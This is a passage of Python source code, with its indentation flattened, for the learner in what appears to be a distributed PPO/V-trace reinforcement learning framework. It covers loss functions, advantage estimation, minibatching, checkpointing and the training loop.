elif self.cfg.exploration_loss == 'symmetric_kl':
self.exploration_loss_func = self._symmetric_kl_exploration_loss
else:
raise NotImplementedError(f'{self.cfg.exploration_loss} not supported!')
if self.cfg.kl_loss_coeff == 0.0:
if is_continuous_action_space(self.action_space):
log.warning(
'WARNING! It is recommended to enable Fixed KL loss (https://arxiv.org/pdf/1707.06347.pdf) for continuous action tasks. '
'I.e. set --kl_loss_coeff=1.0'
)
time.sleep(3.0)
self.kl_loss_func = lambda action_space, action_logits, distribution, valids: 0.0
else:
self.kl_loss_func = self._kl_loss
def _init(self):
log.info('Waiting for the learner to initialize...')
self.train_thread_initialized.wait()
log.info('Learner %d initialized', self.worker_idx)
self.initialized_event.set()
def _terminate(self):
self.terminate = True
def _broadcast_model_weights(self):
state_dict = self.actor_critic.state_dict()
policy_version = self.train_step
log.debug('Broadcast model weights for model version %d', policy_version)
model_state = (policy_version, state_dict)
for q in self.policy_worker_queues:
q.put((TaskType.INIT_MODEL, model_state))
def _calculate_gae(self, buffer):
"""
Calculate advantages using Generalized Advantage Estimation.
        This is left over from the previous version of the algorithm.
Perhaps should be re-implemented in PyTorch tensors, similar to V-trace for uniformity.
"""
rewards = np.copy(buffer.rewards) # [E, T]
dones = np.copy(buffer.dones) # [E, T]
values_arr = np.copy(buffer.values) # [E, T]
# calculating fake values for the last step in the rollout
# this will make sure that advantage of the very last action is always zero
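        # i.e. we choose V(s_{T+1}) so that the last TD error r_T + gamma * V(s_{T+1}) - V(s_T) is exactly zero,
        # which gives V(s_{T+1}) = (V(s_T) - r_T) / gamma, matching next_value below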
values = []
for i in range(len(values_arr)):
last_value, last_reward = values_arr[i][-1], rewards[i, -1]
next_value = (last_value - last_reward) / self.cfg.gamma
values.append(list(values_arr[i]))
values[i].append(float(next_value)) # [T] -> [T+1]
# calculating returns and GAE
rewards = rewards.transpose((1, 0)) # [E, T] -> [T, E]
dones = dones.transpose((1, 0)) # [E, T] -> [T, E]
values = np.asarray(values).transpose((1, 0)) # [E, T+1] -> [T+1, E]
advantages, returns = calculate_gae(rewards, dones, values, self.cfg.gamma, self.cfg.gae_lambda)
# transpose tensors back to [E, T] before creating a single experience buffer
buffer.advantages = advantages.transpose((1, 0)) # [T, E] -> [E, T]
buffer.returns = returns.transpose((1, 0)) # [T, E] -> [E, T]
return buffer
def _prepare_train_buffer(self, rollouts, macro_batch_size, timing):
trajectories = [AttrDict(r['t']) for r in rollouts]
with timing.add_time('buffers'):
buffer = AttrDict()
# by the end of this loop the buffer is a dictionary containing lists of numpy arrays
for i, t in enumerate(trajectories):
for key, x in t.items():
if key not in buffer:
buffer[key] = []
buffer[key].append(x)
# convert lists of dict observations to a single dictionary of lists
for key, x in buffer.items():
if isinstance(x[0], (dict, OrderedDict)):
buffer[key] = list_of_dicts_to_dict_of_lists(x)
with timing.add_time('buffer_stack_and_squeeze'):
tensors_to_squeeze = [
'actions', 'log_prob_actions', 'policy_version', 'policy_id', 'values', 'rewards', 'dones',
]
for d, key, arr in iterate_recursively(buffer):
t = np.stack(arr) # all buffers should now be [E, T, orig_shape]
if key in tensors_to_squeeze:
t = t.squeeze()
d[key] = t
# add max entropy to the rewards
if self.cfg.max_entropy_coeff != 0.0:
with timing.add_time('max_entropy'), torch.no_grad():
action_distr_params = buffer.action_logits.reshape((-1, buffer.action_logits.shape[-1])) # [E*T, A]
entropies = get_action_distribution(self.action_space, torch.Tensor(action_distr_params)).entropy().numpy() # [E*T]
entropies = entropies.reshape((-1, self.cfg.rollout)) # [E, T]
buffer.rewards += self.cfg.max_entropy_coeff * entropies # [E, T]
if not self.cfg.with_vtrace:
with timing.add_time('calc_gae'):
buffer = self._calculate_gae(buffer)
with timing.add_time('batching'):
for d, key, arr in iterate_recursively(buffer):
envs_dim, time_dim = arr.shape[0:2]
new_shape = (envs_dim * time_dim, ) + arr.shape[2:]
d[key] = arr.reshape(new_shape)
# concatenate rollouts from different workers into a single batch efficiently
# that is, if we already have memory for the buffers allocated, we can just copy the data into
# existing cached tensors instead of creating new ones. This is a performance optimization.
use_pinned_memory = self.cfg.device == 'gpu'
buffer = self.tensor_batcher.cat(buffer, macro_batch_size, use_pinned_memory, timing)
with timing.add_time('buff_ready'):
self.shared_buffers.free_trajectory_buffers([r.traj_buffer_idx for r in rollouts])
with timing.add_time('tensors_gpu_float'):
device_buffer = self._copy_train_data_to_device(buffer)
# we no longer need the cached buffer, and can put it back into the pool
self.tensor_batch_pool.put(buffer)
return device_buffer
def _macro_batch_size(self, batch_size):
return self.cfg.num_batches_per_iteration * batch_size
def _process_macro_batch(self, rollouts, batch_size, timing):
macro_batch_size = self._macro_batch_size(batch_size)
assert macro_batch_size % self.cfg.rollout == 0
assert self.cfg.rollout % self.cfg.recurrence == 0
assert macro_batch_size % self.cfg.recurrence == 0
samples = env_steps = 0
for rollout in rollouts:
samples += rollout['length']
env_steps += rollout['env_steps']
with timing.add_time('prepare'):
buffer = self._prepare_train_buffer(rollouts, macro_batch_size, timing)
self.experience_buffer_queue.put((buffer, batch_size, samples, env_steps))
if not self.cfg.benchmark and self.cfg.train_in_background_thread:
# in PyTorch 1.4.0 there is an intense memory spike when the very first batch is being processed
            # we wait here until this is over so we can continue queueing more batches onto the GPU without
            # the risk of running out of GPU memory
while self.num_batches_processed < 1:
log.debug('Waiting for the first batch to be processed')
time.sleep(0.5)
def _process_rollouts(self, rollouts, timing):
# batch_size can potentially change through PBT, so we should keep it the same and pass it around
# using function arguments, instead of using global self.cfg
batch_size = self.cfg.batch_size
rollouts_in_macro_batch = self._macro_batch_size(batch_size) // self.cfg.rollout
if len(rollouts) < rollouts_in_macro_batch:
return rollouts
to_discard = 0
to_process = []
policy_version = self.train_step
for r in rollouts:
mask = r.t['policy_id'] == self.policy_id
if np.any(mask):
rollout_newest_version = r.t['policy_version'][mask].max().item()
else:
log.error(
'Learner %d got a rollout without any transitions produced by policy %d. This must be a bug.',
self.policy_id, self.policy_id,
)
log.error('Rollout policy ids: %r', r.t['policy_id'])
rollout_newest_version = policy_version - self.cfg.max_policy_lag
if policy_version - rollout_newest_version >= self.cfg.max_policy_lag:
# the entire rollout is too old, discard it!
to_discard += 1
self.shared_buffers.free_trajectory_buffers([r.traj_buffer_idx])
else:
# There is some experience in the rollout that we can learn from.
# Old experience (older than max policy lag), experience from other policies (in case of policy
# change on episode boundary), and experience from inactive agents (policy id = -1) will be masked
# out during loss calculations.
to_process.append(r)
if to_discard > 0:
log.warning(
'Discarding %d old rollouts, cut by policy lag threshold %d (learner %d)',
to_discard, self.cfg.max_policy_lag, self.policy_id,
)
rollouts = to_process
self.num_discarded_rollouts += to_discard
if len(rollouts) >= rollouts_in_macro_batch:
# process newest rollouts
rollouts_to_process = rollouts[:rollouts_in_macro_batch]
rollouts = rollouts[rollouts_in_macro_batch:]
self._process_macro_batch(rollouts_to_process, batch_size, timing)
# log.info('Unprocessed rollouts: %d (%d samples)', len(rollouts), len(rollouts) * self.cfg.rollout)
return rollouts
def _get_minibatches(self, batch_size, experience_size):
"""Generating minibatches for training."""
assert self.cfg.rollout % self.cfg.recurrence == 0
assert experience_size % batch_size == 0, f'experience size: {experience_size}, batch size: {batch_size}'
if self.cfg.num_batches_per_iteration == 1:
return [None] # single minibatch is actually the entire buffer, we don't need indices
# indices that will start the mini-trajectories from the same episode (for bptt)
indices = np.arange(0, experience_size, self.cfg.recurrence)
indices = np.random.permutation(indices)
# complete indices of mini trajectories, e.g. with recurrence==4: [4, 16] -> [4, 5, 6, 7, 16, 17, 18, 19]
indices = [np.arange(i, i + self.cfg.recurrence) for i in indices]
indices = np.concatenate(indices)
assert len(indices) == experience_size
num_minibatches = experience_size // batch_size
minibatches = np.split(indices, num_minibatches)
return minibatches
@staticmethod
def _get_minibatch(buffer, indices):
if indices is None:
# handle the case of a single batch, where the entire buffer is a minibatch
return buffer
mb = AttrDict()
for item, x in buffer.items():
if isinstance(x, (dict, OrderedDict)):
mb[item] = AttrDict()
for key, x_elem in x.items():
mb[item][key] = x_elem[indices]
else:
mb[item] = x[indices]
return mb
def _should_save_summaries(self):
summaries_every_seconds = self.summary_rate_decay_seconds.at(self.train_step)
if time.time() - self.last_summary_time < summaries_every_seconds:
return False
return True
def _after_optimizer_step(self):
"""A hook to be called after each optimizer step."""
self.train_step += 1
self._maybe_save()
def _maybe_save(self):
if time.time() - self.last_saved_time >= self.cfg.save_every_sec or self.should_save_model:
self._save()
self.model_saved_event.set()
self.should_save_model = False
self.last_saved_time = time.time()
@staticmethod
def checkpoint_dir(cfg, policy_id):
checkpoint_dir = join(experiment_dir(cfg=cfg), f'checkpoint_p{policy_id}')
return ensure_dir_exists(checkpoint_dir)
@staticmethod
def get_checkpoints(checkpoints_dir):
checkpoints = glob.glob(join(checkpoints_dir, 'checkpoint_*'))
return sorted(checkpoints)
def _get_checkpoint_dict(self):
checkpoint = {
'train_step': self.train_step,
'env_steps': self.env_steps,
'model': self.actor_critic.state_dict(),
'optimizer': self.optimizer.state_dict(),
}
if self.aux_loss_module is not None:
checkpoint['aux_loss_module'] = self.aux_loss_module.state_dict()
return checkpoint
def _save(self):
checkpoint = self._get_checkpoint_dict()
assert checkpoint is not None
checkpoint_dir = self.checkpoint_dir(self.cfg, self.policy_id)
tmp_filepath = join(checkpoint_dir, '.temp_checkpoint')
checkpoint_name = f'checkpoint_{self.train_step:09d}_{self.env_steps}.pth'
filepath = join(checkpoint_dir, checkpoint_name)
log.info('Saving %s...', tmp_filepath)
torch.save(checkpoint, tmp_filepath)
log.info('Renaming %s to %s', tmp_filepath, filepath)
os.rename(tmp_filepath, filepath)
while len(self.get_checkpoints(checkpoint_dir)) > self.cfg.keep_checkpoints:
oldest_checkpoint = self.get_checkpoints(checkpoint_dir)[0]
if os.path.isfile(oldest_checkpoint):
log.debug('Removing %s', oldest_checkpoint)
os.remove(oldest_checkpoint)
if self.cfg.save_milestones_sec > 0:
# milestones enabled
if time.time() - self.last_milestone_time >= self.cfg.save_milestones_sec:
milestones_dir = ensure_dir_exists(join(checkpoint_dir, 'milestones'))
milestone_path = join(milestones_dir, f'{checkpoint_name}.milestone')
log.debug('Saving a milestone %s', milestone_path)
shutil.copy(filepath, milestone_path)
self.last_milestone_time = time.time()
@staticmethod
def _policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high, valids):
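        # PPO clipped surrogate objective: maximize E[min(ratio * adv, clip(ratio, clip_ratio_low, clip_ratio_high) * adv)]
        # over the valid samples, implemented here as a negated mean so it can be minimized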
clipped_ratio = torch.clamp(ratio, clip_ratio_low, clip_ratio_high)
loss_unclipped = ratio * adv
loss_clipped = clipped_ratio * adv
loss = torch.min(loss_unclipped, loss_clipped)
loss = torch.masked_select(loss, valids)
loss = -loss.mean()
return loss
def _value_loss(self, new_values, old_values, target, clip_value, valids):
value_clipped = old_values + torch.clamp(new_values - old_values, -clip_value, clip_value)
value_original_loss = (new_values - target).pow(2)
value_clipped_loss = (value_clipped - target).pow(2)
value_loss = torch.max(value_original_loss, value_clipped_loss)
value_loss = torch.masked_select(value_loss, valids)
value_loss = value_loss.mean()
value_loss *= self.cfg.value_loss_coeff
return value_loss
def _kl_loss(self, action_space, action_logits, action_distribution, valids):
old_action_distribution = get_action_distribution(action_space, action_logits)
kl_loss = action_distribution.kl_divergence(old_action_distribution)
kl_loss = torch.masked_select(kl_loss, valids)
kl_loss = kl_loss.mean()
kl_loss *= self.cfg.kl_loss_coeff
return kl_loss
def _entropy_exploration_loss(self, action_distribution, valids):
entropy = action_distribution.entropy()
entropy = torch.masked_select(entropy, valids)
entropy_loss = -self.cfg.exploration_loss_coeff * entropy.mean()
return entropy_loss
def _symmetric_kl_exploration_loss(self, action_distribution, valids):
kl_prior = action_distribution.symmetric_kl_with_uniform_prior()
kl_prior = torch.masked_select(kl_prior, valids).mean()
if not torch.isfinite(kl_prior):
kl_prior = torch.zeros(kl_prior.shape)
kl_prior = torch.clamp(kl_prior, max=30)
kl_prior_loss = self.cfg.exploration_loss_coeff * kl_prior
return kl_prior_loss
def _curr_lr(self):
for param_group in self.optimizer.param_groups:
return param_group['lr']
def _update_lr(self, new_lr):
if new_lr != self._curr_lr():
for param_group in self.optimizer.param_groups:
param_group['lr'] = new_lr
def _prepare_observations(self, obs_tensors, gpu_buffer_obs):
for d, gpu_d, k, v, _ in iter_dicts_recursively(obs_tensors, gpu_buffer_obs):
device, dtype = self.actor_critic.device_and_type_for_input_tensor(k)
tensor = v.detach().to(device, copy=True).type(dtype)
gpu_d[k] = tensor
def _copy_train_data_to_device(self, buffer):
device_buffer = copy_dict_structure(buffer)
for key, item in buffer.items():
if key == 'obs':
self._prepare_observations(item, device_buffer['obs'])
else:
device_tensor = item.detach().to(self.device, copy=True, non_blocking=True)
device_buffer[key] = device_tensor.float()
device_buffer['dones_cpu'] = buffer.dones.to('cpu', copy=True, non_blocking=True).float()
device_buffer['rewards_cpu'] = buffer.rewards.to('cpu', copy=True, non_blocking=True).float()
return device_buffer
def _train(self, gpu_buffer, batch_size, experience_size, timing):
with torch.no_grad():
policy_version_before_train = self.train_step
early_stopping_tolerance = 1e-6
early_stop = False
prev_epoch_actor_loss = 1e9
epoch_actor_losses = []
            # recent mean KL-divergences per minibatch; this is used by the LR schedulers
recent_kls = []
# V-trace parameters
# noinspection PyArgumentList
rho_hat = torch.Tensor([self.cfg.vtrace_rho])
# noinspection PyArgumentList
c_hat = torch.Tensor([self.cfg.vtrace_c])
clip_ratio_high = 1.0 + self.cfg.ppo_clip_ratio # e.g. 1.1
            # this still works with e.g. clip_ratio = 2, while PPO's usual 1 - clip_ratio would give a negative lower bound
clip_ratio_low = 1.0 / clip_ratio_high
clip_value = self.cfg.ppo_clip_value
gamma = self.cfg.gamma
recurrence = self.cfg.recurrence
if self.cfg.with_vtrace:
assert recurrence == self.cfg.rollout and recurrence > 1, \
                'V-trace requires recurrence and rollout to be equal'
num_sgd_steps = 0
stats_and_summaries = None
if not self.with_training:
return stats_and_summaries
for epoch in range(self.cfg.ppo_epochs):
with timing.add_time('epoch_init'):
if early_stop or self.terminate:
break
summary_this_epoch = force_summaries = False
minibatches = self._get_minibatches(batch_size, experience_size)
for batch_num in range(len(minibatches)):
with timing.add_time('minibatch_init'):
indices = minibatches[batch_num]
# current minibatch consisting of short trajectory segments with length == recurrence
mb = self._get_minibatch(gpu_buffer, indices)
# calculate policy head outside of recurrent loop
with timing.add_time('forward_head'):
head_outputs = self.actor_critic.forward_head(mb.obs)
# initial rnn states
with timing.add_time('bptt_initial'):
if self.cfg.use_rnn:
head_output_seq, rnn_states, inverted_select_inds = build_rnn_inputs(
head_outputs, mb.dones_cpu, mb.rnn_states, recurrence,
)
else:
rnn_states = mb.rnn_states[::recurrence]
# calculate RNN outputs for each timestep in a loop
with timing.add_time('bptt'):
if self.cfg.use_rnn:
with timing.add_time('bptt_forward_core'):
core_output_seq, _ = self.actor_critic.forward_core(head_output_seq, rnn_states)
core_outputs = build_core_out_from_seq(core_output_seq, inverted_select_inds)
else:
core_outputs, _ = self.actor_critic.forward_core(head_outputs, rnn_states)
num_trajectories = head_outputs.size(0) // recurrence
with timing.add_time('tail'):
assert core_outputs.shape[0] == head_outputs.shape[0]
# calculate policy tail outside of recurrent loop
result = self.actor_critic.forward_tail(core_outputs, with_action_distribution=True)
action_distribution = result.action_distribution
log_prob_actions = action_distribution.log_prob(mb.actions)
ratio = torch.exp(log_prob_actions - mb.log_prob_actions) # pi / pi_old
# super large/small values can cause numerical problems and are probably noise anyway
ratio = torch.clamp(ratio, 0.05, 20.0)
values = result.values.squeeze()
with torch.no_grad(): # these computations are not the part of the computation graph
# ignore experience from other agents (i.e. on episode boundary) and from inactive agents
valids = mb.policy_id == self.policy_id
# ignore experience that was older than the threshold even before training started
valids = valids & (policy_version_before_train - mb.policy_version < self.cfg.max_policy_lag)
if self.cfg.with_vtrace:
ratios_cpu = ratio.cpu()
values_cpu = values.cpu()
rewards_cpu = mb.rewards_cpu
dones_cpu = mb.dones_cpu
vtrace_rho = torch.min(rho_hat, ratios_cpu)
vtrace_c = torch.min(c_hat, ratios_cpu)
vs = torch.zeros((num_trajectories * recurrence))
adv = torch.zeros((num_trajectories * recurrence))
next_values = (values_cpu[recurrence - 1::recurrence] - rewards_cpu[recurrence - 1::recurrence]) / gamma
next_vs = next_values
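                            # V-trace targets (Espeholt et al., 2018): v_s = V(x_s) + delta_s + gamma * c_s * (v_{s+1} - V(x_{s+1})),
                            # with delta_s = rho_s * (r_s + gamma * V(x_{s+1}) - V(x_s)); the loop below computes this backwards in time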
with timing.add_time('vtrace'):
for i in reversed(range(self.cfg.recurrence)):
rewards = rewards_cpu[i::recurrence]
dones = dones_cpu[i::recurrence]
not_done = 1.0 - dones
not_done_times_gamma = not_done * gamma
curr_values = values_cpu[i::recurrence]
curr_vtrace_rho = vtrace_rho[i::recurrence]
curr_vtrace_c = vtrace_c[i::recurrence]
delta_s = curr_vtrace_rho * (rewards + not_done_times_gamma * next_values - curr_values)
adv[i::recurrence] = curr_vtrace_rho * (rewards + not_done_times_gamma * next_vs - curr_values)
next_vs = curr_values + delta_s + not_done_times_gamma * curr_vtrace_c * (next_vs - next_values)
vs[i::recurrence] = next_vs
next_values = curr_values
targets = vs
else:
# using regular GAE
adv = mb.advantages
targets = mb.returns
adv_mean = adv.mean()
adv_std = adv.std()
adv = (adv - adv_mean) / max(1e-3, adv_std) # normalize advantage
adv = adv.to(self.device)
with timing.add_time('losses'):
policy_loss = self._policy_loss(ratio, adv, clip_ratio_low, clip_ratio_high, valids)
exploration_loss = self.exploration_loss_func(action_distribution, valids)
kl_loss = self.kl_loss_func(self.actor_critic.action_space, mb.action_logits, action_distribution, valids)
actor_loss = policy_loss + exploration_loss + kl_loss
epoch_actor_losses.append(actor_loss.item())
targets = targets.to(self.device)
old_values = mb.values
value_loss = self._value_loss(values, old_values, targets, clip_value, valids)
critic_loss = value_loss
loss = actor_loss + critic_loss
if self.aux_loss_module is not None:
with timing.add_time('aux_loss'):
aux_loss = self.aux_loss_module(
mb.actions.view(num_trajectories, recurrence, -1),
(1.0 - mb.dones).view(num_trajectories, recurrence, 1),
valids.view(num_trajectories, recurrence, -1),
head_outputs.view(num_trajectories, recurrence, -1),
core_outputs.view(num_trajectories, recurrence, -1),
)
loss = loss + aux_loss
high_loss = 30.0
if abs(to_scalar(policy_loss)) > high_loss or abs(to_scalar(value_loss)) > high_loss or abs(to_scalar(exploration_loss)) > high_loss or abs(to_scalar(kl_loss)) > high_loss:
log.warning(
'High loss value: l:%.4f pl:%.4f vl:%.4f exp_l:%.4f kl_l:%.4f (recommended to adjust the --reward_scale parameter)',
to_scalar(loss), to_scalar(policy_loss), to_scalar(value_loss), to_scalar(exploration_loss), to_scalar(kl_loss),
)
force_summaries = True
with timing.add_time('kl_divergence'):
# calculate KL-divergence with the behaviour policy action distribution
old_action_distribution = get_action_distribution(
self.actor_critic.action_space, mb.action_logits,
)
kl_old = action_distribution.kl_divergence(old_action_distribution)
kl_old_mean = kl_old.mean().item()
recent_kls.append(kl_old_mean)
# update the weights
with timing.add_time('update'):
# following advice from https://youtu.be/9mS1fIYj1So set grad to None instead of optimizer.zero_grad()
for p in self.actor_critic.parameters():
p.grad = None
if self.aux_loss_module is not None:
for p in self.aux_loss_module.parameters():
p.grad = None
loss.backward()
if self.cfg.max_grad_norm > 0.0:
with timing.add_time('clip'):
torch.nn.utils.clip_grad_norm_(self.actor_critic.parameters(), self.cfg.max_grad_norm)
if self.aux_loss_module is not None:
torch.nn.utils.clip_grad_norm_(self.aux_loss_module.parameters(), self.cfg.max_grad_norm)
curr_policy_version = self.train_step # policy version before the weight update
with self.policy_lock:
self.optimizer.step()
num_sgd_steps += 1
with torch.no_grad():
with timing.add_time('after_optimizer'):
self._after_optimizer_step()
if self.lr_scheduler.invoke_after_each_minibatch():
self._update_lr(self.lr_scheduler.update(self._curr_lr(), recent_kls))
# collect and report summaries
with_summaries = self._should_save_summaries() or force_summaries
if with_summaries and not summary_this_epoch:
stats_and_summaries = self._record_summaries(AttrDict(locals()))
summary_this_epoch = True
force_summaries = False
# end of an epoch
if self.lr_scheduler.invoke_after_each_epoch():
self._update_lr(self.lr_scheduler.update(self._curr_lr(), recent_kls))
# this will force policy update on the inference worker (policy worker)
self.policy_versions[self.policy_id] = self.train_step
new_epoch_actor_loss = np.mean(epoch_actor_losses)
loss_delta_abs = abs(prev_epoch_actor_loss - new_epoch_actor_loss)
if loss_delta_abs < early_stopping_tolerance:
early_stop = True
log.debug(
'Early stopping after %d epochs (%d sgd steps), loss delta %.7f',
epoch + 1, num_sgd_steps, loss_delta_abs,
)
break
prev_epoch_actor_loss = new_epoch_actor_loss
epoch_actor_losses = []
return stats_and_summaries
def _record_summaries(self, train_loop_vars):
var = train_loop_vars
self.last_summary_time = time.time()
stats = AttrDict()
stats.lr = self._curr_lr()
stats.valids_fraction = var.valids.float().mean()
stats.same_policy_fraction = (var.mb.policy_id == self.policy_id).float().mean()
grad_norm = sum(
p.grad.data.norm(2).item() ** 2
for p in self.actor_critic.parameters()
if p.grad is not None
) ** 0.5
stats.grad_norm = grad_norm
stats.loss = var.loss
stats.value = var.result.values.mean()
stats.entropy = var.action_distribution.entropy().mean()
stats.policy_loss = var.policy_loss
stats.kl_loss = var.kl_loss
stats.value_loss = var.value_loss
stats.exploration_loss = var.exploration_loss
if self.aux_loss_module is not None:
stats.aux_loss = var.aux_loss
stats.adv_min = var.adv.min()
stats.adv_max = var.adv.max()
stats.adv_std = var.adv_std
stats.max_abs_logprob = torch.abs(var.mb.action_logits).max()
if hasattr(var.action_distribution, 'summaries'):
stats.update(var.action_distribution.summaries())
if var.epoch == self.cfg.ppo_epochs - 1 and var.batch_num == len(var.minibatches) - 1:
# we collect these stats only for the last PPO batch, or every time if we're only doing one batch, IMPALA-style
ratio_mean = torch.abs(1.0 - var.ratio).mean().detach()
ratio_min = var.ratio.min().detach()
ratio_max = var.ratio.max().detach()
# log.debug('Learner %d ratio mean min max %.4f %.4f %.4f', self.policy_id, ratio_mean.cpu().item(), ratio_min.cpu().item(), ratio_max.cpu().item())
value_delta = torch.abs(var.values - var.old_values)
value_delta_avg, value_delta_max = value_delta.mean(), value_delta.max()
stats.kl_divergence = var.kl_old_mean
stats.kl_divergence_max = var.kl_old.max()
stats.value_delta = value_delta_avg
stats.value_delta_max = value_delta_max
stats.fraction_clipped = ((var.ratio < var.clip_ratio_low).float() + (var.ratio > var.clip_ratio_high).float()).mean()
stats.ratio_mean = ratio_mean
stats.ratio_min = ratio_min
stats.ratio_max = ratio_max
stats.num_sgd_steps = var.num_sgd_steps
# this caused numerical issues on some versions of PyTorch with second moment reaching infinity
adam_max_second_moment = 0.0
for key, tensor_state in self.optimizer.state.items():
adam_max_second_moment = max(tensor_state['exp_avg_sq'].max().item(), adam_max_second_moment)
stats.adam_max_second_moment = adam_max_second_moment
version_diff = (var.curr_policy_version - var.mb.policy_version)[var.mb.policy_id == self.policy_id]
stats.version_diff_avg = version_diff.mean()
stats.version_diff_min = version_diff.min()
stats.version_diff_max = version_diff.max()
for key, value in stats.items():
stats[key] = to_scalar(value)
return stats
def _update_pbt(self):
"""To be called from the training loop, same thread that updates the model!"""
with self.pbt_mutex:
if self.load_policy_id is not None:
assert self.cfg.with_pbt
log.debug('Learner %d loads policy from %d', self.policy_id, self.load_policy_id)
self.load_from_checkpoint(self.load_policy_id)
self.load_policy_id = None
if self.new_cfg is not None:
for key, value in self.new_cfg.items():
if self.cfg[key] != value:
log.debug('Learner %d replacing cfg parameter %r with new value %r', self.policy_id, key, value)
self.cfg[key] = value
for param_group in self.optimizer.param_groups:
param_group['lr'] = self.cfg.learning_rate
param_group['betas'] = (self.cfg.adam_beta1, self.cfg.adam_beta2)
log.debug('Updated optimizer lr to value %.7f, betas: %r', param_group['lr'], param_group['betas'])
self.new_cfg = None
@staticmethod
def load_checkpoint(checkpoints, device):
if len(checkpoints) <= 0:
log.warning('No checkpoints found')
return None
else:
latest_checkpoint = checkpoints[-1]
# extra safety mechanism to recover from spurious filesystem errors
num_attempts = 3
for attempt in range(num_attempts):
try:
log.warning('Loading state from checkpoint %s...', latest_checkpoint)
checkpoint_dict = torch.load(latest_checkpoint, map_location=device)
return checkpoint_dict
except Exception:
log.exception(f'Could not load from checkpoint, attempt {attempt}')
def _load_state(self, checkpoint_dict, load_progress=True):
if load_progress:
self.train_step = checkpoint_dict['train_step']
self.env_steps = checkpoint_dict['env_steps']
self.actor_critic.load_state_dict(checkpoint_dict['model'])
self.optimizer.load_state_dict(checkpoint_dict['optimizer'])
if self.aux_loss_module is not None:
self.aux_loss_module.load_state_dict(checkpoint_dict['aux_loss_module'])
log.info('Loaded experiment state at training iteration %d, env step %d', self.train_step, self.env_steps)
def init_model(self, timing):
self.actor_critic = create_actor_critic(self.cfg, self.obs_space, self.action_space, timing)
self.actor_critic.model_to_device(self.device)
self.actor_critic.share_memory()
if self.cfg.use_cpc:
self.aux_loss_module = CPCA(self.cfg, self.action_space)
if self.aux_loss_module is not None:
self.aux_loss_module.to(device=self.device)
def load_from_checkpoint(self, policy_id):
checkpoints = self.get_checkpoints(self.checkpoint_dir(self.cfg, policy_id))
checkpoint_dict = self.load_checkpoint(checkpoints, self.device)
if checkpoint_dict is None:
log.debug('Did not load from checkpoint, starting from scratch!')
else:
log.debug('Loading model from checkpoint')
# if we're replacing our policy with another policy (under PBT), let's not reload the env_steps
load_progress = policy_id == self.policy_id
self._load_state(checkpoint_dict, load_progress=load_progress)
def initialize(self, timing):
with timing.timeit('init'):
# initialize the Torch modules
if self.cfg.seed is None:
log.info('Starting seed is not provided')
else:
log.info('Setting fixed seed %d', self.cfg.seed)
torch.manual_seed(self.cfg.seed)
np.random.seed(self.cfg.seed)
# this does not help with a single experiment
# but seems to do better when we're running more than one experiment in parallel
torch.set_num_threads(1)
if self.cfg.device == 'gpu':
torch.backends.cudnn.benchmark = True
# we should already see only one CUDA device, because of env vars
assert torch.cuda.device_count() == 1
self.device = torch.device('cuda', index=0)
else:
self.device = torch.device('cpu')
self.init_model(timing)
params = list(self.actor_critic.parameters())
if self.aux_loss_module is not None:
params += list(self.aux_loss_module.parameters())
self.optimizer = torch.optim.Adam(
params,
self.cfg.learning_rate,
betas=(self.cfg.adam_beta1, self.cfg.adam_beta2),
eps=self.cfg.adam_eps,
)
self.lr_scheduler = get_lr_scheduler(self.cfg)
self.load_from_checkpoint(self.policy_id)
self._broadcast_model_weights() # sync the very first version of the weights
self.train_thread_initialized.set()
def _process_training_data(self, data, timing, wait_stats=None):
self.is_training = True
buffer, batch_size, samples, env_steps = data
assert samples == batch_size * self.cfg.num_batches_per_iteration
self.env_steps += env_steps
experience_size = buffer.rewards.shape[0]
stats = dict(learner_env_steps=self.env_steps, policy_id=self.policy_id)
with timing.add_time('train'):
discarding_rate = self._discarding_rate()
self._update_pbt()
train_stats = self._train(buffer, batch_size, experience_size, timing)
if train_stats is not None:
stats['train'] = train_stats
if wait_stats is not None:
wait_avg, wait_min, wait_max = wait_stats
stats['train']['wait_avg'] = wait_avg
stats['train']['wait_min'] = wait_min
stats['train']['wait_max'] = wait_max
stats['train']['discarded_rollouts'] = self.num_discarded_rollouts
stats['train']['discarding_rate'] = discarding_rate
stats['stats'] = memory_stats('learner', self.device)
self.is_training = False
try:
safe_put(self.report_queue, stats, queue_name='report')
except Full:
log.warning('Could not report training stats, the report queue is full!')
def _train_loop(self):
timing = Timing()
self.initialize(timing)
wait_times = deque([], maxlen=self.cfg.num_workers)
last_cache_cleanup = time.time()
while not self.terminate:
with timing.timeit('train_wait'):
data = safe_get(self.experience_buffer_queue)
if self.terminate:
break
wait_stats = None
wait_times.append(timing.train_wait)
if len(wait_times) >= wait_times.maxlen:
wait_times_arr = np.asarray(wait_times)
wait_avg = np.mean(wait_times_arr)
wait_min, wait_max = wait_times_arr.min(), wait_times_arr.max()
# log.debug(
# 'Training thread had to wait %.5f s for the new experience buffer (avg %.5f)',
# timing.train_wait, wait_avg,
# )
wait_stats = (wait_avg, wait_min, wait_max)
self._process_training_data(data, timing, wait_stats)
self.num_batches_processed += 1
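            # free cached GPU memory roughly every 5 minutes, and after each of the first ~50 batches of a run (unless benchmarking)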
if time.time() - last_cache_cleanup > 300.0 or (not self.cfg.benchmark and self.num_batches_processed < 50):
if self.cfg.device == 'gpu':
torch.cuda.empty_cache()
torch.cuda.ipc_collect()
last_cache_cleanup = time.time()
time.sleep(0.3)
log.info('Train loop timing: %s', timing)
del self.actor_critic
del self.device
def _experience_collection_rate_stats(self):
now = time.time()
if now - self.discarded_experience_timer > 1.0:
self.discarded_experience_timer = now
self.discarded_experience_over_time.append((now, self.num_discarded_rollouts))
def _discarding_rate(self):
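        # rollouts discarded per second, measured between the oldest and newest tracked samples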
if len(self.discarded_experience_over_time) <= 1:
return 0
first, last = self.discarded_experience_over_time[0], self.discarded_experience_over_time[-1]
delta_rollouts = last[1] - first[1]
delta_time = last[0] - first[0]
discarding_rate = delta_rollouts / (delta_time + EPS)
return discarding_rate
def _extract_rollouts(self, data):
rollouts = []
for rollout_data in data:
tensors = self.rollout_tensors.index(rollout_data['traj_buffer_idx'])
rollout_data['t'] = tensors
rollouts.append(AttrDict(rollout_data))
return rollouts
def _process_pbt_task(self, pbt_task):
task_type, data = pbt_task
with self.pbt_mutex:
if task_type == PbtTask.SAVE_MODEL:
policy_id = data
assert policy_id == self.policy_id
self.should_save_model = True
elif task_type == PbtTask.LOAD_MODEL:
policy_id, new_policy_id = data
assert policy_id == self.policy_id
assert new_policy_id is not None
self.load_policy_id = new_policy_id
elif task_type == PbtTask.UPDATE_CFG:
policy_id, new_cfg = data
assert policy_id == self.policy_id
self.new_cfg = new_cfg
